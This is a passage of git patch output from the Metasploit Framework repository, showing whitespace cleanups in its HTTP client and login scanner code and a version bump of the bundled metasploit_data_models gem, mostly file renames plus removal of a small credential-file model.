files changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..b2962369ca 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,7 +169,7 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] + opts['agent'] ||= config['agent'] opts['data'] ||= '' opts['uri'] ||= '/' opts['cookie'] ||= config['cookie'] @@ -179,7 +179,7 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -221,12 +221,12 @@ class Client opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['vars_get'] ||= {} opts['vars_post'] ||= {} - + opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' + opts['version'] = opts['version'] || config['version'] || '1.1' opts['client_config'] = self.config diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..d307453b40 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -118,9 +118,9 @@ class ClientRequest if encode req << set_encode_uri(uri_str) else - req << uri_str + req << uri_str end - + if (qstr.length > 0) req << '?' @@ -456,4 +456,4 @@ end end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 4324e312f2..40446f68db 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -116,10 +116,10 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - + response = do_http_login(user,pass) result = determine_result(response) - + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 28cb3bb245..937130a1f4 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -132,7 +132,7 @@ describe Rex::Proto::Http::Client do # These set_ methods all exercise the evasion opts, looks like it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - + end it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do From b6458d2bfa54fa33801da1f62e418ba000e45477 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Wed, 23 Jan 2013 21:48:53 -0600 Subject: [PATCH 083/139] Update MDM gem in gemcache --- .../app/models/mdm/cred_file.rb | 8 -------- .../.gitignore | 0 .../.rspec | 0 .../Gemfile | 0 .../LICENSE | 2 +- .../README.md | 0 .../Rakefile | 0 .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 0 .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 .../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 0 .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 1 - .../bin/mdm_console | 0 .../console_db.yml | 0 .../lib/mdm.rb | 0 .../lib/mdm/host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../lib/metasploit_data_models/base64_serializer.rb | 0 .../lib/metasploit_data_models/engine.rb | 0 .../lib/metasploit_data_models/serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../validators/password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 2 +- .../metasploit_data_models.gemspec | 2 +- .../script/rails | 0 .../spec/dummy/Rakefile | 0 .../spec/dummy/app/assets/javascripts/application.js | 0 .../spec/dummy/app/assets/stylesheets/application.css | 0 .../spec/dummy/app/controllers/application_controller.rb | 0 .../spec/dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../spec/dummy/app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../spec/dummy/config/environments/development.rb | 0 .../spec/dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../spec/dummy/config/initializers/backtrace_silencers.rb | 0 .../spec/dummy/config/initializers/inflections.rb | 0 .../spec/dummy/config/initializers/mime_types.rb | 0 .../spec/dummy/config/initializers/secret_token.rb | 0 .../spec/dummy/config/initializers/session_store.rb | 0 .../spec/dummy/config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 0 98 files changed, 3 insertions(+), 12 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/.gitignore (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/.rspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/Gemfile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/LICENSE (97%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/README.md (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/web_vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/app/models/mdm/workspace.rb (98%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/console_db.yml (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/engine.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/lib/metasploit_data_models/version.rb (95%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/metasploit_data_models.gemspec (94%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/config/routes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/dummy/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.3.0 => metasploit_data_models-0.4.0}/spec/spec_helper.rb (100%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb deleted file mode 100755 index f8bc29d84c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb +++ /dev/null @@ -1,8 +0,0 @@ -class Mdm::CredFile < ActiveRecord::Base - # - # Relations - # - belongs_to :workspace, :class_name => 'Mdm::Workspace' - - ActiveSupport.run_load_hooks(:mdm_cred_file, self) -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE similarity index 97% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE index 7b9ec00a08..7743a2ea9a 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE @@ -1,4 +1,4 @@ -Copyright (C) 2012, Rapid7 LLC +Copyright (C) 2012, Rapid7, Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb diff --git 